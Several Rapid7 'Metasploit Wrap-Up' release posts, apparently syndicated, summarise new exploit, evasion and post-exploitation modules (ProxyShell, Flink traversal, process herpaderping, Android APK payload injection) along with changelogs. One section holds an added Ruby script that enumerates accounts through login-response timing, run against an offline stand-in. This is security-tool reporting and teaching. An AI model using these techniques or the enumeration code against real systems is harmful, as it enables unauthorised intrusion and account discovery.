
The Metasploit project is proud to return to Google Summer of Code for 2022. Contributor applications will open April 4th and close April 19th. Changes this year open the program up to all newcomers to open source who are 18 years and older. Join us on Slack and check out our How-To and Ideas pages to get started. We are still expanding on ideas and are eager to see what you’d like to add to Metasploit.

New module content (5)

Enhancements and features

  • #16135 from sjanusz-r7 – This adds support for logging Meterpreter’s TLV Packets with setg SessionTlvLogging true. Other values for the SessionTlvLogging option include console, false, and file:<file_location>.
  • #16141 from adfoster-r7 – This adds service manager commands to msfconsole.
  • #16219 from sjanusz-r7 – This updates the packet inspection for the enumextcmd and loadlib commands to log human readable string identifiers in addition to the integer value command ids that were introduced as part of Metasploit 6.
  • #16258 from sjanusz-r7 – This improves Meterpreter’s TLV logging support to show human readable names for Meterpreter TLV values. To view this functionality, run setg SessionTlvLogging true with a Meterpreter session open, then run a Meterpreter command such as dir.
  • #16269 from bcoles – This improves validation for Android payloads to verify Java is correctly installed and apktool.jar exists in the same directory as apktool.
  • #16270 from bcoles – This improves validation for Android payloads to notify the user if a keytool error is present, such as being unable to parse the provided APK file or certificate.
  • #16282 from 3V3RYONE – This adds the lcat command to Meterpreter which allows the user to cat a local file.
  • #16288 from bcoles – This change displays the output of apktool if it contains Java exceptions, which is useful for debugging errors in Android APK injection.

Bugs fixed

  • #16145 from adfoster-r7 – This fixes a case sensitivity issue with option handling for the to_handler command on Metasploit payloads. Previously, setting an LPORT value within a payload would not correctly override the previously set lport value.
  • #16153 from jmartin-r7 – This fixes a bug in the auxiliary/client/smtp/emailer which previously handled multiline SMTP responses incorrectly, stopping the module from emailing the payload successfully.
  • #16265 from smashery – This fixes an edgecase which led to a running job being cleaned up twice, causing unintended errors. Now the job is only cleaned up once.
  • #16268 from bwatters-r7 – This updates the check method of the exploit/windows/local/bypassuac_comhijack module to identify Windows 10 versions 1903 and later as not being affected. This also switches the module to run the check method automatically which will help inform users when the target system is or is not vulnerable.
  • #16283 from bcoles – This change fixes an error when attempting to inject into an unsigned APK file. A suitable error message is now displayed.
  • #16286 from bcoles – This fixes a payload truncation issue in post/windows/manage/persistence_exe on Windows systems caused by the usage of IO.read.
  • #16294 from bcoles – This change fixes the Android APK injection functionality of msfvenom to use the new signing tool apksigner instead of jarsigner, which allows the applications to install successfully on the latest version of Android (Android 11).
  • #16310 from adfoster-r7 – This fixes an edge case where setting multiple RHOST values for a module which did not support this option would cause the module to run multiple times instead of once.
  • #16311 from sjanusz-r7 – This updates msfconsole’s search functionality to include the 64-bit variant of the encrypted_shell payloads (payload/windows/x64/encrypted_shell).
  • #16312 from bwatters-r7 – This fixes two issues with the pwnkit exploit for CVE-2021-4034. The first issue fixed was a compatibility check between the target host architecture and the payload. The second issue fixed was with the on session callback that sets the current working directory.
  • #16322 from zeroSteiner – This fixes a regression issue with the hosts command tab completion and the --search option’s functionality.


Metasploit Wrap-Up

Post Syndicated from Jeffrey Martin original https://blog.rapid7.com/2021/12/10/metasploit-wrap-up-142/

Word and Javascript are a rare duo.


Thanks to thesunRider, you too can experience the wonder of this mystical duo. The sole new Metasploit module in this release adds a file format attack that generates a very special document. JavaScript embedded in a Word document triggers a chain of events that slips through various Windows facilities, and a session as the user who opened the document can be yours.

Do you like spiders?

It has been three years since SMB2 support was added to SMB share enumeration, and over a year since SMB3 support followed, yet the spiders are not done spinning their webs. Thanks to sjanusz-r7, the spiders have evolved to take advantage of these new skills, and their webs can span new doorways. Updates to scanner/smb/smb_enumshares improve enumeration support for the latest Windows targets, which ship with only SMB3 enabled by default.

New module content (1)

Enhancements and features

  • #15854 from sjanusz-r7 – This updates the SpiderProfiles option of the scanner/smb/smb_enumshares module to work against newer SMB3 targets such as Windows 10, Windows Server 2016, and later.
  • #15888 from sjanusz-r7 – This adds anonymised database statistics to msfconsole’s debug command, which is used to help developers track down database issues as part of user generated error reports.
  • #15929 from bcoles – This adds nine new Windows 2003 SP2 targets that the exploit/windows/smb/ms08_067_netapi module can exploit.

Bugs fixed

  • #15808 from timwr – This fixes a compatibility issue with the PowerShell read_file method on Windows Server 2012 by using the older PowerShell syntax (New-Object).
  • #15937 from adfoster-r7 – This removes usage of SortedSet to improve support for Ruby 3.
  • #15939 from zeroSteiner – This fixes a bug where the Meterpreter dir/ls function would show the creation date instead of the modified date for the directory contents.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Jeffrey Martin original https://blog.rapid7.com/2021/08/20/metasploit-wrap-up-126/

Anyone enjoy making chains?


The community is hard at work building chains to pull sessions out of vulnerable Exchange servers. This week Rapid7’s own wvu and Spencer McIntyre added a module that implements the ProxyShell exploit chain originally demonstrated by Orange Tsai. The module also benefited from research and analysis by Jang, PeterJson, brandonshi123, and mekhalleh (RAMELLA Sébastien), and it makes exploitation as simple as supplying the email address of an administrator on a vulnerable version of Exchange as the entry point to chain CVE-2021-31207, CVE-2021-34523, and CVE-2021-34473 into sessions for everyone to enjoy.

Great to see some GSoC value in the wild.

With Google Summer of Code 2021 moving into its final phases, pingport80 had four PRs land in this week’s release. These improvements and fixes to session interactions make post-exploitation tasks more accessible, bringing the community more capabilities and stability along the way.

New module content (2)

Enhancements and features

  • #15540 from dwelch-r7 – This adds an option to cmd_execute to have the command run in a subshell by Meterpreter.
  • #15556 from pingport80 – This adds shell session compatibility to the post/windows/gather/enum_unattend module.
  • #15564 from pingport80 – This adds support to the get_env and command_exists? post API methods for PowerShell session types.

Bugs fixed

  • #15303 from pingport80 – This PR ensures that the shell dir command returns a list.
  • #15332 from pingport80 – This improves localization support and compatibility in the session post API’s rename_file method.
  • #15539 from tomadimitrie – This improves the OS version check in the check method of exploit/windows/local/cve_2018_8453_win32k_priv_esc.
  • #15546 from timwr – This ensures that the UUID URLs of stageless reverse_http(s) payloads are stored in the database so that they can be properly tracked with payload UUID tracking. This also fixes an error caused by accessing contents of a url list without checking if it’s valid first.
  • #15570 from adfoster-r7 – This fixes a bug in the auxiliary/scanner/smb/smb_enum_gpp module where the path that was being generated by the module caused an SMB exception to be raised.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Jeffrey Martin original https://blog.rapid7.com/2021/02/26/metasploit-wrap-up-100/


In this week’s round of modules, contributor bcoles offered up two modules to leverage that Apache Flink install you found in some fun new ways. If you are just looking to filch a few files, auxiliary/scanner/http/apache_flink_jobmanager_traversal leverages CVE-2020-17519 to pilfer the filesystem on Flink versions 1.11.0 through 1.11.2. The second module, for a little extra fun, exploit/multi/http/apache_flink_jar_upload_exec uses Flink’s job upload functionality to run arbitrary Java code as the web server user; turns out there is a Meterpreter for that!

RDP: a dream and a nightmare for the sysAdmin near you.

Ever wonder if exposing a remote desktop in a web page was a good idea? I mean, it’s just a web server, and the internet loves those. Turns out timing attacks can expose your usernames when someone chooses to pay close attention: the Remote Desktop Web Access login form takes measurably longer to respond for accounts that exist than for ones that do not. A recently added module, auxiliary/scanner/http/rdp_web_login contributed by Matthew Dunn, can even pay attention for you. With a few options set, the module enumerates valid users by timing each login attempt.
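
The measurement behind that kind of enumeration, as an added example that is not the rdp_web_login module’s own code. It assumes a login form whose response time is longer for existing accounts than for unknown ones; `enumerate_users`, `median_login_time` and `fake_probe` are names chosen here, and the timing model in `fake_probe` (valid accounts forwarded to a slow domain-controller check, unknown accounts rejected locally) is a constructed stand-in so the example runs offline. A baseline is taken from a username that cannot exist, several samples per candidate are reduced to a median to ride out jitter, and a candidate is reported when its median exceeds a multiple of that baseline.

```ruby
# Added example (not the rdp_web_login module's own code): user enumeration
# through a login-form timing side channel. A real probe would time an HTTP
# POST to the RD Web login page; here the probe is a constructed stand-in so
# the example runs offline.

# Median rather than mean, so a single slow outlier does not flip a decision.
def median(values)
  sorted = values.sort
  mid = sorted.size / 2
  sorted.size.odd? ? sorted[mid] : (sorted[mid - 1] + sorted[mid]) / 2.0
end

# Times `samples` login attempts for `user` and returns the median in ms.
# `probe` is any callable that performs one attempt and returns elapsed ms.
def median_login_time(user, probe, samples)
  median(Array.new(samples) { probe.call(user) })
end

# Classifies candidates as existing accounts when their median response time
# exceeds `ratio` times the baseline measured for a user that cannot exist.
# Returns [found_users, baseline_ms].
def enumerate_users(candidates, probe:, samples: 5, ratio: 2.0,
                    baseline_user: 'zz_no_such_user_8f3a1c')
  baseline = median_login_time(baseline_user, probe, samples)
  found = candidates.select do |user|
    median_login_time(user, probe, samples) > baseline * ratio
  end
  [found, baseline]
end

# Constructed stand-in for the target (assumption for illustration only):
# valid domain accounts are forwarded to the domain controller for a password
# check (slow), unknown accounts are rejected locally (fast), both with jitter.
VALID_ACCOUNTS = %w[administrator svc_backup].freeze

def fake_probe(seed: 1)
  rng = Random.new(seed)
  lambda do |user|
    base = VALID_ACCOUNTS.include?(user.downcase) ? 900.0 : 150.0
    base + rng.rand(-40.0..40.0)
  end
end

if __FILE__ == $PROGRAM_NAME
  found, baseline = enumerate_users(%w[administrator guest svc_backup jsmith],
                                    probe: fake_probe)
  puts "baseline #{baseline.round}ms; accounts that exist: #{found.join(', ')}"
end
```

Against a real target the probe would be a lambda that submits one login with a wrong password and returns the elapsed time; keep in mind that every probe is a failed logon for that account, so lockout thresholds and logon-failure alerting apply to the scan just as they would to a password spray.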

Have you heard of herpaderping?

For those that have, Metasploit now has a new toy for you. Christophe De La Fuente built on some great research by Johnny Shaw to bring this technique to Metasploit. Process herpaderping creates a process from an executable file and then overwrites that file on disk before the process starts running, so the bytes an AV engine or forensic tool reads from disk are not the code that actually executes. Using the new evasion/windows/process_herpaderping module, you too can generate Windows PE files that hide the code behind the curtain, if you will, when executed on a target.

Join the community.

For anyone interested in working with Metasploit in this year’s Google Summer of Code, you’ll have to wait until March 9th to find out if we’ve been accepted as mentors. However, you can get a head start by checking out our current project shortlist. Said shortlist is still being worked on, and applicants can suggest their own project ideas, so get looking and see what jumps out at you!

New Modules (4)

Enhancements and features

  • #14784 from bcoles This fixes a bug in the ScadaBR credential dumping module that prevented it from processing response data.

  • #14617 from zeroSteiner The core Meterpreter and console libraries have been updated to better handle cases where a given Meterpreter implementation does not support a certain command. Instead of each version of Meterpreter trying to handle invalid commands, which previously led to errors, the console now checks whether the implementation supports the command and prints an error message if it does not. The output of the help or ? command inside the Meterpreter prompt has also been updated so that it does not display commands a given Meterpreter implementation does not support. Tests have been updated accordingly to check that this functionality works as expected.

  • #14670 from adfoster-r7 Word wrapping of Rex tables is now enabled by default for all Rex tables except for those output by the creds and search commands. This feature can optionally be turned off by issuing the features set wrapped_tables false command.

  • #14735 from adfoster-r7 Updates have been made to require all new modules to now pass RuboCop and msftidy.rb checks prior to being merged into the framework. These checks will now be run automatically on PRs to detect issues rather than users having to run these tools manually to detect code quality issues within their contributions.

  • #14740 from zeroSteiner This makes a few improvements to the CVE-2021-3156 exploit module and adds a couple of features that were left out of the first submission due to time constraints (e.g. cleanup and randomisation of the payload library).

Bugs Fixed

  • #14748 from cdelafuente-r7 A bug has been fixed in the Auxiliary::AuthBrute mixin that caused a crash when the DB_ALL_USERS or DB_ALL_PASS options were set.
  • #14789 from zeroSteiner A bug has been fixed whereby Meterpreter sessions were incorrectly being validated due to the fact that TLV encryption for the session would take place before session verification. The fix now considers Meterpreter sessions valid if they successfully negotiate TLV encryption. This fix also removes the AutoVerifySession datastore option since all valid Meterpreter instances should negotiate TLV encryption automatically.
  • #14802 from dwelch-r7 A bug within the Kiwi library has been fixed whereby commands passed to Kiwi via the kiwi_cmd command in Metasploit were not properly enclosed in double quotes, which could lead Kiwi to treat a single space-separated command as two separate commands to execute.
  • #14812 from dwelch-r7 Restores missing requires for SOCKS5 proxy support.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).